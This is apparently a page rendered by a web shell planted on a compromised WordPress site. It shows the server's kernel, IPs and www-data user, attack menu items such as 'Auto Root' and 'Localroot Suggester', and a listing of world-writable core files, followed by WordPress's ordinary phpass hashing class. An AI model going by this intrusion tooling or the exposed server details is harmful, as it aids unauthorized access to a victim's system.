Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 3.149.10.88
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
blocks /
html /
Delete
Unzip
Name
Size
Permission
Date
Action
admin-bar.php
36.24
KB
-rwxrwxrwx
2025-05-09 07:39
annotations-20250514002205.js
22.79
KB
-rwxrwxrwx
2025-04-15 17:44
autop.min.js
5.48
KB
-rwxrwxrwx
2024-04-03 05:49
avatar.php
5.61
KB
-rwxrwxrwx
2024-11-13 12:36
block.json
526
B
-rwxrwxrwx
2024-04-03 05:49
blocks-20250514003832.js
554.02
KB
-rwxrwxrwx
2025-04-15 17:44
button.php
1.76
KB
-rwxrwxrwx
2024-07-16 17:55
cache.php
13.16
KB
-rwxrwxrwx
2022-10-10 18:22
capabilities.php
41.72
KB
-rwxrwxrwx
2024-11-13 12:36
class-IXR.php
2.55
KB
-rwxrwxrwx
2025-04-15 17:44
class-http.php
367
B
-rwxrwxrwx
2022-06-17 11:20
class-phpass.php
6.61
KB
-rwxrwxrwx
2024-11-13 12:36
class-requests.php
2.18
KB
-rwxrwxrwx
2023-04-05 13:12
class-wp-comment.php
9.22
KB
-rwxrwxrwx
2025-04-15 17:44
class-wp-styles.php
10.75
KB
-rwxrwxrwx
2024-11-13 12:36
class-wp-theme.php
64.27
KB
-rwxrwxrwx
2025-04-15 17:44
class-wp-widget.php
18
KB
-rwxrwxrwx
2025-04-15 17:44
class.wp-styles.php
338
B
-rwxrwxrwx
2022-09-20 14:17
comments-pagination-next.php
1.88
KB
-rwxrwxrwx
2024-11-13 12:36
comments.php
6.61
KB
-rwxrwxrwx
2024-07-16 17:55
customize-loader.min-20250513213733.js
3.47
KB
-rwxrwxrwx
2023-02-02 16:36
customize-views.min-20250513214459.js
2.39
KB
-rwxrwxrwx
2021-01-06 15:29
customize-views.min.js
2.39
KB
-rwxrwxrwx
2021-01-06 15:29
deprecated.php
187.07
KB
-rwxrwxrwx
2025-04-15 17:44
dimensions.php
5.28
KB
-rwxrwxrwx
2024-04-03 05:49
duotone.php
2.67
KB
-rwxrwxrwx
2024-07-16 17:55
edit-site-20250514004515.js
1.56
MB
-rwxrwxrwx
2025-04-15 17:44
editor-20250514002056.js
1.16
MB
-rwxrwxrwx
2025-04-30 17:44
editor-20250514100730.css
856
B
-rwxrwxrwx
2024-07-16 17:55
editor-rtl-20250514101625.css
857
B
-rwxrwxrwx
2024-07-16 17:55
editor-rtl.css
269
B
-rwxrwxrwx
2024-11-13 12:36
editor-rtl.min-20250514133605-20250515012636.css
766
B
-rwxrwxrwx
2024-07-16 17:55
editor-rtl.min-20250514133605.css
766
B
-rwxrwxrwx
2024-07-16 17:55
editor-rtl.min.css
766
B
-rwxrwxrwx
2024-07-16 17:55
editor.css
856
B
-rwxrwxrwx
2024-07-16 17:55
editor.min-20250514131222.css
765
B
-rwxrwxrwx
2024-07-16 17:55
editor.min.css
765
B
-rwxrwxrwx
2024-07-16 17:55
elements.php
8.46
KB
-rwxrwxrwx
2024-07-16 17:55
embed-404.php
967
B
-rwxrwxrwx
2022-03-22 16:25
feed-atom-comments.php
5.38
KB
-rwxrwxrwx
2024-04-03 05:49
getid3.php
79.1
KB
-rwxrwxrwx
2024-04-03 05:49
home-link-20250514174234.php
5.31
KB
-rwxrwxrwx
2025-04-15 17:44
home-link.php
5.31
KB
-rwxrwxrwx
2025-04-15 17:44
http.php
24.72
KB
-rwxrwxrwx
2025-05-09 07:39
i18n.min.js
8.93
KB
-rwxrwxrwx
2024-04-03 05:49
index.php
4.99
KB
-rwxrwxrwx
2024-11-13 12:36
jquery.Jcrop.min.js
22.06
KB
-rwxrwxrwx
2022-03-24 20:07
ms-network.php
3.69
KB
-rwxrwxrwx
2023-05-02 11:26
ms-settings.php
4.1
KB
-rwxrwxrwx
2025-04-15 17:44
notices.js
21.47
KB
-rwxrwxrwx
2025-04-15 17:44
nux-20250514002854.js
12.98
KB
-rwxrwxrwx
2025-04-15 17:44
pattern.php
1.75
KB
-rwxrwxrwx
2025-04-15 17:44
pluggable-deprecated.php
6.18
KB
-rwxrwxrwx
2025-04-15 17:44
plupload-20250514002206.js
58.9
KB
-rwxrwxrwx
2019-11-03 17:09
post-content.php
2.11
KB
-rwxrwxrwx
2024-07-16 17:55
post-date.php
3.05
KB
-rwxrwxrwx
2024-11-13 12:36
post-excerpt.php
3.37
KB
-rwxrwxrwx
2024-07-16 17:55
private-apis-20250514002209.js
8.3
KB
-rwxrwxrwx
2025-04-15 17:44
private-apis.min-20250514003319.js
2.75
KB
-rwxrwxrwx
2025-04-15 17:44
readonly.php
1.22
KB
-rwxrwxrwx
2024-04-03 05:49
registration-functions-20250514174117.php
200
B
-rwxrwxrwx
2020-11-12 11:17
shortcode.min-20250513213234.js
2.58
KB
-rwxrwxrwx
2022-09-23 19:55
shortcodes.php
23.49
KB
-rwxrwxrwx
2024-07-16 17:55
speculative-loading-20250514075900.php
8.36
KB
-rwxrwxrwx
2025-04-15 17:44
speculative-loading.php
8.36
KB
-rwxrwxrwx
2025-04-15 17:44
taxonomy.php
172.1
KB
-rwxrwxrwx
2025-05-09 07:39
term-description.php
1.3
KB
-rwxrwxrwx
2024-07-16 17:55
widget-group.php
2.38
KB
-rwxrwxrwx
2024-07-16 17:55
wp-mediaelement-20250514002653.js
2.69
KB
-rwxrwxrwx
2023-02-07 16:00
wp-pointer-rtl.min.css
3.17
KB
-rwxrwxrwx
2021-09-02 22:18
Save
Rename
<?php /** * Portable PHP password hashing framework. * @package phpass * @since 2.5.0 * @version 0.5 / WordPress * @link https://www.openwall.com/phpass/ */ # # Portable PHP password hashing framework. # # Version 0.5.4 / WordPress. # # Written by Solar Designer <solar at openwall.com> in 2004-2006 and placed in # the public domain. Revised in subsequent years, still public domain. # # There's absolutely no warranty. # # The homepage URL for this framework is: # # http://www.openwall.com/phpass/ # # Please be sure to update the Version line if you edit this file in any way. # It is suggested that you leave the main version number intact, but indicate # your project name (after the slash) and add your own revision information. # # Please do not change the "private" password hashing method implemented in # here, thereby making your hashes incompatible. However, if you must, please # change the hash type identifier (the "$P$") to something different. # # Obviously, since this code is in the public domain, the above are not # requirements (there can be none), but merely suggestions. # /** * Portable PHP password hashing framework. * * @package phpass * @version 0.5 / WordPress * @link https://www.openwall.com/phpass/ * @since 2.5.0 */ class PasswordHash { var $itoa64; var $iteration_count_log2; var $portable_hashes; var $random_state; function __construct($iteration_count_log2, $portable_hashes) { $this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31) { $iteration_count_log2 = 8; } $this->iteration_count_log2 = $iteration_count_log2; $this->portable_hashes = $portable_hashes; $this->random_state = microtime(); if (function_exists('getmypid')) { $this->random_state .= getmypid(); } } function PasswordHash($iteration_count_log2, $portable_hashes) { self::__construct($iteration_count_log2, $portable_hashes); } function get_random_bytes($count) { $output = ''; if (@is_readable('/dev/urandom') && ($fh = @fopen('/dev/urandom', 'rb'))) { $output = fread($fh, $count); fclose($fh); } if (strlen($output) < $count) { $output = ''; for ($i = 0; $i < $count; $i += 16) { $this->random_state = md5(microtime() . $this->random_state); $output .= md5($this->random_state, TRUE); } $output = substr($output, 0, $count); } return $output; } function encode64($input, $count) { $output = ''; $i = 0; do { $value = ord($input[$i++]); $output .= $this->itoa64[$value & 0x3f]; if ($i < $count) { $value |= ord($input[$i]) << 8; } $output .= $this->itoa64[($value >> 6) & 0x3f]; if ($i++ >= $count) { break; } if ($i < $count) { $value |= ord($input[$i]) << 16; } $output .= $this->itoa64[($value >> 12) & 0x3f]; if ($i++ >= $count) { break; } $output .= $this->itoa64[($value >> 18) & 0x3f]; } while ($i < $count); return $output; } function gensalt_private($input) { $output = '$P$'; $output .= $this->itoa64[min($this->iteration_count_log2 + 5, 30)]; $output .= $this->encode64($input, 6); return $output; } function crypt_private($password, $setting) { $output = '*0'; if (substr($setting, 0, 2) === $output) { $output = '*1'; } $id = substr($setting, 0, 3); # We use "$P$", phpBB3 uses "$H$" for the same thing if ($id !== '$P$' && $id !== '$H$') { return $output; } $count_log2 = strpos($this->itoa64, $setting[3]); if ($count_log2 < 7 || $count_log2 > 30) { return $output; } $count = 1 << $count_log2; $salt = substr($setting, 4, 8); if (strlen($salt) !== 8) { return $output; } # We were kind of forced to use MD5 here since it's the only # cryptographic primitive that was available in all versions # of PHP in use. To implement our own low-level crypto in PHP # would have resulted in much worse performance and # consequently in lower iteration counts and hashes that are # quicker to crack (by non-PHP code). $hash = md5($salt . $password, TRUE); do { $hash = md5($hash . $password, TRUE); } while (--$count); $output = substr($setting, 0, 12); $output .= $this->encode64($hash, 16); return $output; } function gensalt_blowfish($input) { # This one needs to use a different order of characters and a # different encoding scheme from the one in encode64() above. # We care because the last character in our encoded string will # only represent 2 bits. While two known implementations of # bcrypt will happily accept and correct a salt string which # has the 4 unused bits set to non-zero, we do not want to take # chances and we also do not want to waste an additional byte # of entropy. $itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; $output = '$2a$'; $output .= chr((int)(ord('0') + $this->iteration_count_log2 / 10)); $output .= chr(ord('0') + $this->iteration_count_log2 % 10); $output .= '$'; $i = 0; do { $c1 = ord($input[$i++]); $output .= $itoa64[$c1 >> 2]; $c1 = ($c1 & 0x03) << 4; if ($i >= 16) { $output .= $itoa64[$c1]; break; } $c2 = ord($input[$i++]); $c1 |= $c2 >> 4; $output .= $itoa64[$c1]; $c1 = ($c2 & 0x0f) << 2; $c2 = ord($input[$i++]); $c1 |= $c2 >> 6; $output .= $itoa64[$c1]; $output .= $itoa64[$c2 & 0x3f]; } while (1); return $output; } function HashPassword($password) { if ( strlen( $password ) > 4096 ) { return '*'; } $random = ''; if (CRYPT_BLOWFISH === 1 && !$this->portable_hashes) { $random = $this->get_random_bytes(16); $hash = crypt($password, $this->gensalt_blowfish($random)); if (strlen($hash) === 60) { return $hash; } } if (strlen($random) < 6) { $random = $this->get_random_bytes(6); } $hash = $this->crypt_private($password, $this->gensalt_private($random)); if (strlen($hash) === 34) { return $hash; } # Returning '*' on error is safe here, but would _not_ be safe # in a crypt(3)-like function used _both_ for generating new # hashes and for validating passwords against existing hashes. return '*'; } function CheckPassword($password, $stored_hash) { if ( strlen( $password ) > 4096 ) { return false; } $hash = $this->crypt_private($password, $stored_hash); if ($hash[0] === '*') { $hash = crypt($password, $stored_hash); } # This is not constant-time. In order to keep the code simple, # for timing safety we currently rely on the salts being # unpredictable, which they are at least in the non-fallback # cases (that is, when we use /dev/urandom and bcrypt). return $hash === $stored_hash; } }